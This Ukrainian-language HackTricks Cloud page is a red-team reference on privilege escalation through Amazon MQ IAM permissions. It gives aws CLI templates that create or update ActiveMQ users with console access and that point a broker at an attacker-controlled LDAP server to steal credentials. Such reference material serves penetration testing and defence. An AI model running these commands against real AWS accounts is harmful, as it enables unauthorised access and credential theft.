AWS - MQ Privesc
Reading time: 3 minutes
tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримка HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
MQ
Для отримання додаткової інформації про MQ див.:
mq:ListBrokers, mq:CreateUser
З такими дозволами ви можете створити нового користувача в брокері ActimeMQ (це не працює в RabbitMQ):
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
Потенційний вплив: Доступ до конфіденційної інформації при навігації у ActiveMQ
mq:ListBrokers, mq:ListUsers, mq:UpdateUser
З цими дозволами ви можете створити нового користувача в брокері ActimeMQ (це не працює в RabbitMQ):
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
Можливий вплив: Отримання доступу до конфіденційної інформації під час роботи з ActiveMQ
mq:ListBrokers, mq:UpdateBroker
Якщо брокер використовує LDAP для авторизації з ActiveMQ, можливо змінити конфігурацію LDAP‑сервера, що використовується, на таку, що контролюється атакуючим. Таким чином атакуючий зможе вкрасти всі облікові дані, що передаються через LDAP.
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...
Якщо ви якимось чином зможете знайти оригінальні credentials, які використовуються ActiveMQ, ви зможете виконати MitM, вкрасти creds, використати їх на оригінальному сервері та відправити відповідь (можливо, просто повторно використовуючи вкрадені credentials, ви зможете це зробити).
Потенційний вплив: Вкрасти ActiveMQ credentials
tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримка HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
HackTricks Cloud